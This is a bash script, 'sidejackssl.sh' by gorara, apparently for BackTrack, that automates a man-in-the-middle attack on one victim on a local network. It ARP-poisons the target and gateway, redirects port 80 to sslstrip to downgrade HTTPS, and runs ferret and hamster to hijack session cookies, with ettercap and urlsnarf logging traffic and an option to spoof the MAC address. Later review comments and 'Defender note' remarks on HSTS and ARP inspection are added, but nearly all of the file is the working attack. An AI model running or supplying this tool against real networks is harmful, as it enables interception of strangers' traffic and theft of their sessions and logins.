1. #!/bin/bash
  2.  
  3. # sidejackssl.sh v0.1
  4. # tested in backtrack 4 R2 environment, run as root.
  5. # xterm used for window control
  6. # arpspoof poisons a single victim and gateway
  7. # ferret and hamster for sidejacking
  8. # sslstrip for https
  9. # ettercap for everything else
  10. # urlsnarf to monitor visited urls
  11. # firefox needs to be configured with a proxy of 127.0.0.1:1234
  12. # url for hamster server is http://hamster
  13. # by gorara
  14.  
  15. # a few variables (do not change)
  16. m1="0"                  # missing file var m1
  17. m2="0"                  # missing file var m2
  18. m3="0"                  # missing file var m3
  19. m4="0"                  # missing file var m4
  20. quickclean="0"              # used for quick clean up
  21. randmac="n"             # default setting do not randomize MAC
  22. hamsterfile="hamster.txt"       # hamster output file (you can't change it)
  23. trap 'cleanup' SIGINT SIGTERM       # detect control-c
  24.  
  25. # a few more variables (change these if required)
  26.  
  27. # xterm window variables
  28. x="0"                   # x offset value
  29. y="0"                   # y offset value
  30. width="120"             # width value
  31. height="7"              # height value
  32. yoffset="120"               # y offset
  33. fgcolor="white"             # foreground color
  34. bgcolor="black"             # background color
  35.  
  36. # style variables
  37. warnstyle="[\e[01;38mw\e[00m]"      # warning msgs style
  38. execstyle="[\e[01;32mx\e[00m]"      # execute msgs style
  39. infostyle="[\e[01;34mi\e[00m]"      # informational msgs style
  40. inputstyle="[\e[01;30m?\e[00m]"     # input msgs style
  41.  
  42. # file variables
  43. sslstripfile="sslstrip.log"     # sslstrip output file name
  44. snifffile="sniff-*"         # hamster sniff file wildcard
  45. etterfile="etter.cap"           # ettercap output cap file
  46. temp="/tmp"             # temporary dir
  47.  
  48. function usage
  49. {
  50.     clear
  51.     echo "Usage: bash $0 -i interface -t target -g gateway [-r] [-h]"
  52.     echo ""
  53.     echo "  -i interface    interface to use, ex. eth0, wlan0."
  54.     echo "  -t target   the target IP address."
  55.     echo "  -g gateway  the gateway IP address."
  56.     echo "  -r      randomize your MAC address,"
  57.     echo "          only use for wired interfaces."
  58.     echo "  -h      display this help screen."
  59.     echo ""
  60.     echo "  examples: "
  61.     echo "   bash $0 -i eth0 -t 192.168.0.1 -g 192.168.0.254 -r"
  62.     echo "   bash $0 -i wlan0 -t 192.168.0.1 -g 192.168.0.254"
  63.     echo ""
  64.     exit 0
  65. }
  66.  
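#######################################
# Signal handler: undo the host changes made by this script and offer to
# delete the output files it left behind.
# Globals (read):    quickclean, randmac, origmac, interface, gw, temp,
#                    sslstripfile, etterfile, snifffile, hamsterfile,
#                    warnstyle, infostyle, execstyle
# Globals (written): m1, m2, m3, m4, delete, delete_marker
# Arguments: none
# Returns:   never; always exits with status 0
#######################################
function cleanup() {
  local f
  local -a sniffs=()

  echo -e "\n$warnstyle control-c pressed! "

  # exit script if nothing has been modified
  if [[ "$quickclean" = "1" ]]; then
    echo -e "$infostyle nothing changed, all done!"
    exit 0
  fi

  echo -e "$infostyle cleaning up..."

  # Remove only the redirect rule the main program appended. A blanket
  # "iptables -F" / "iptables -t nat -F" would also erase every rule the host
  # had before the script ran and leave it without its firewall policy.
  # Keep this rule spec identical to the one added in the main program.
  echo -e "$execstyle removing iptables redirect rule..."
  if ! iptables -t nat -D PREROUTING -p tcp --destination-port 80 \
      -j REDIRECT --to-port 10000 2>/dev/null; then
    echo -e "$warnstyle redirect rule not present, nothing to remove."
  fi

  # NOTE(review): the value ip_forward had before the script ran is not saved
  # anywhere visible, so a host that was already routing ends up with
  # forwarding switched off.
  echo -e "$execstyle turning off IP forwarding..."
  echo "0" > /proc/sys/net/ipv4/ip_forward

  # change back MAC address to original one
  if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then
    echo -e "$execstyle resetting MAC address..."
    echo -e "$infostyle original MAC is: $origmac"
    if [[ -n "$origmac" ]]; then
      ifconfig "$interface" down
      ifconfig "$interface" hw ether "$origmac"
      ifconfig "$interface" up
    else
      # Without a recorded address there is nothing valid to restore.
      echo -e "$warnstyle original MAC unknown, interface left untouched."
    fi
    if [[ -z "$gw" ]]; then
      echo -e "$warnstyle WARNING, you have no default gateway!"
    else
      route add default gw "$gw"
    fi
    rm -f -- "$temp/mac.orig" "$temp/gw.orig"
  fi

  echo -e "$execstyle cleaning up files..."
  echo -e "$infostyle temp directory: "

  # testing to see if files exist, if so display them...
  if [[ -f "$temp/$sslstripfile" ]]; then
    ls -- "$temp/$sslstripfile"
  else
    m1="1"
  fi

  if [[ -f "$temp/$etterfile" ]]; then
    ls -- "$temp/$etterfile"
  else
    m2="1"
  fi

  echo -e "$infostyle current directory: "

  # $snifffile holds a glob, so it is expanded unquoted on purpose and the
  # matches are collected one by one. Testing the raw pattern with
  # "[ -f ... ]" fails as soon as more than one file matches.
  for f in $snifffile; do
    if [[ -f "$f" ]]; then
      sniffs+=("$f")
    fi
  done
  if (( ${#sniffs[@]} > 0 )); then
    ls -- "${sniffs[@]}"
  else
    m3="1"
  fi

  if [[ -f "$hamsterfile" ]]; then
    ls -- "$hamsterfile"
  else
    m4="1"
  fi

  # testing to see if there are any files at all
  if [[ $m1 -eq 0 || $m2 -eq 0 || $m3 -eq 0 || $m4 -eq 0 ]]; then

    # Ask until the answer is y or n; a failed read (closed input) ends the
    # loop without deleting anything.
    while true; do
      echo -en "$infostyle delete file(s)? [y/n]: "
      read -r delete || break
      case "$delete" in
        y) delete_marker="y"; echo -e "$warnstyle deleting files!"; break ;;
        n) echo -e "$warnstyle nothing deleted!"; break ;;
        *) echo -e "$warnstyle wrong selection!" ;;
      esac
    done

    # delete files as requested
    if [[ "$delete_marker" = "y" ]]; then
      for f in "$temp/$sslstripfile" "$temp/$etterfile" \
          "${sniffs[@]}" "$hamsterfile"; do
        if [[ -f "$f" ]]; then
          rm -- "$f"
        fi
      done
    fi

  else
    echo -e "$warnstyle nothing to delete!"
  fi

  echo -e "$infostyle all done!"
  exit 0
}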
  177.  
  178.  
  179. # start main program
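# Called without any argument: print the help text (usage exits).
if [ "$#" -eq 0 ]; then
  usage
fi

# Parse the command line. The trailing "shift" drops the option word; an
# option that takes a value drops that value with its own "shift 1" first.
while [ "$#" -gt 0 ]; do
  case "$1" in
    -i|-t|-g)
      # A value-taking option given as the last word has no value.
      if [ "$#" -lt 2 ]; then
        usage
      fi
      case "$1" in
        -i) interface=$2 ;;
        -t) target=$2 ;;
        -g) gateway=$2 ;;
      esac
      shift 1
      ;;
    # -r is a plain flag. It must not shift an extra word, otherwise the
    # option that follows it on the command line is silently skipped.
    -r) randmac="y" ;;
    -h) usage ;;
    -*) usage; break ;;
    *) break ;;
  esac
  shift
done

# required parameters
if [[ -z $interface || -z $target || -z $gateway ]]; then
  usage
  exit 0
fi

# These three values are later handed to commands that the header says run
# as root, so refuse anything that is not a plain interface name or a
# dotted-quad address (the help text documents both targets as IP addresses).
sj_iface_re='^[A-Za-z0-9][A-Za-z0-9_.:-]*$'
sj_ipv4_re='^([0-9]{1,3}\.){3}[0-9]{1,3}$'
if [[ ! $interface =~ $sj_iface_re || ! $target =~ $sj_ipv4_re ||
      ! $gateway =~ $sj_ipv4_re ]]; then
  echo -e "$warnstyle invalid interface name or IP address." >&2
  exit 1
fi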
  203.  
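clear

# Text form of the -r choice, used only in the summary line below.
if [[ "$randmac" = "y" ]]; then
  mac="yes"
else
  mac="no"
fi

# set quick cleanup flag: while it is 1, cleanup exits without undoing
# anything because nothing on the host has been changed yet.
quickclean="1"

echo -e "$infostyle sidejacker/sslstrip script v0.1, by gorara"
echo -e "$infostyle ctrl-c to abort at any time."
echo -e "$infostyle attack summary:"
echo -e "$infostyle host $target and gateway $gateway from $interface, spoof MAC: $mac"

if [[ "$randmac" = "y" ]]; then

  echo -e "$execstyle change of $interface MAC address requested."

  # Interfaces whose name looks wireless are refused outright.
  if [[ "$interface" = wlan* || "$interface" = wifi* || "$interface" = ath* ]]; then
    echo -e "$infostyle wireless device detected..."
    echo -e "$warnstyle can't change MAC address without taking wifi interface down"
    echo -e "$warnstyle do it manually before connecting to the AP."
    exit 0
  fi

  # Interfaces named eth* need an explicit "y" because the link goes down.
  if [[ "$interface" = eth* ]]; then
    echo -e "$infostyle wired device detected..."
    echo -e "$warnstyle WARNING, this will take your wired interface down temporarily."
    echo -en "$inputstyle do you want to continue? [y/n]: "
    # -r keeps backslashes in the typed answer literal.
    read -r continue
    if [[ "$continue" = "y" ]]; then
      echo -e "$infostyle proceeding..."
    else
      echo -e "$infostyle exiting..."
      exit 0
    fi
  fi

  # Record the current hardware address. "$interface" is quoted so a value
  # containing spaces or glob characters reaches ifconfig as one argument.
  # NOTE(review): this relies on ifconfig printing a "HWaddr" field; if the
  # field is absent origmac is left empty.
  origmac=$(ifconfig "$interface" | grep HWaddr | awk '{print $5}')

fi

# before this, ctrl-c will exit script without doing anything.
quickclean="0"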
  250.  
# use macchanger to randomize MAC address, etc.
# The interface is taken down, given a random address and brought back up;
# the default route is then re-added from the value captured beforehand.
# NOTE(review): the option parser only ever sets randmac to "y", so the "Y"
# comparison looks unreachable -- confirm.
if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then
echo -e "$execstyle randomizing MAC address...";
# NOTE(review): the redirection here is attached to a bare assignment, so
# gw.orig is created (or truncated) empty; the gateway is kept only in $gw.
gw=`route -n | grep UG | awk {'print $2'}` > $temp/gw.orig
ifconfig $interface down
# macchanger's report is parsed below for the "Current" and "Faked" lines.
# NOTE(review): fixed file names under $temp (default /tmp) are written by a
# script documented as running as root; an existing symlink of that name
# would be followed. A directory from "mktemp -d" would avoid this.
macchanger -r $interface > $temp/mac.orig
ifconfig $interface up
    # NOTE(review): $gw is unquoted; if route lists more than one "UG" entry
    # the test receives several words and errors out.
    if [ -z $gw ]; then
    echo -e "$warnstyle WARNING, you have no default gateway!"
    else
    route add default gw $gw
    fi
# Third field of the matching report lines; origmac set earlier from
# ifconfig is overwritten here.
origmac=`cat $temp/mac.orig | grep Current | awk {'print $3'}`
fakemac=`cat $temp/mac.orig | grep Faked | awk {'print $3'}`
echo -e "$infostyle original MAC is: $origmac"
echo -e "$infostyle faked    MAC is: $fakemac"
fi
  268.  
# From here on the host's network state is changed; cleanup (run from the
# INT/TERM trap) is what undoes it.
# NOTE(review): every expansion passed to the commands below is unquoted and
# comes from the command line or the variables at the top of the file.

# Writes 1 to the kernel's IPv4 forwarding switch.
# NOTE(review): the previous value is not recorded; cleanup always writes 0.
echo -e "$execstyle turning on IP Forwarding..."
echo "1" > /proc/sys/net/ipv4/ip_forward

# Appends a nat/PREROUTING rule that redirects TCP port 80 to local port
# 10000. NOTE(review): sslstrip is started below without a listen-port
# option, so 10000 is presumably its default -- confirm.
echo -e "$execstyle configuring iptables..."
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 1

# Each tool runs in its own background xterm, titled after the tool.
# The header comments give hamster's proxy as 127.0.0.1:1234.
echo -e "$execstyle starting hamster  ... <logging to: $hamsterfile>"
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "hamster" -e /pentest/sniffers/hamster/hamster &
sleep 2

# y grows by yoffset before every further window so they stack vertically.
echo -e "$execstyle starting ferret   ... <logging to: console>"
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ferret" -e /pentest/sniffers/hamster/ferret -i $interface &
sleep 2

# sslstrip writes its log to $temp/$sslstripfile.
# Defender note: sites that send HSTS (ideally preloaded) and never serve
# content over plain HTTP are not affected by an HTTP-level downgrade.
echo -e "$execstyle starting sslstrip ... <logging to: $temp/$sslstripfile>"
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "sslstrip" -e sslstrip -w $temp/$sslstripfile &
sleep 2

# ettercap writes a capture to $temp/$etterfile, with the gateway and the
# target as its two target specifications.
echo -e "$execstyle starting ettercap ... <logging to: $temp/$etterfile>"
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ettercap" -e ettercap -Tqpi $interface -w $temp/$etterfile /$gateway/ /$target/ &
sleep 2

# urlsnarf output goes only to its xterm window.
echo -e "$execstyle starting urlsnarf ... <logging to: console>"
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "urlsnarf" -e urlsnarf -i $interface &
sleep 2

echo -e "$infostyle trap is ready, now to direct traffic..."

# Defender note: the resulting change of the gateway's MAC address in the
# target's ARP cache is visible to ARP monitoring, and switch-level dynamic
# ARP inspection or static ARP entries prevent it.
echo -e "$execstyle ARP poisoning the target..."
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "arpspoof" -e arpspoof -i $interface -t $target $gateway &
sleep 1

echo -e "$infostyle run firefox and type http://hamster"
echo -e "$infostyle don't forget to set proxy to 127.0.0.1:1234"
echo -e "$infostyle press ctrl-c to exit and clean up... \n"
# Endless loop that keeps the script in the foreground: every line read from
# stdin just re-prints the hint. The loop has no exit of its own; the script
# ends through the cleanup trap.
for ((;;)) do
read loop
echo -en "$infostyle press ctrl-c to terminate!"
done

# Follows an endless loop with no break, so this line is never reached.
exit 0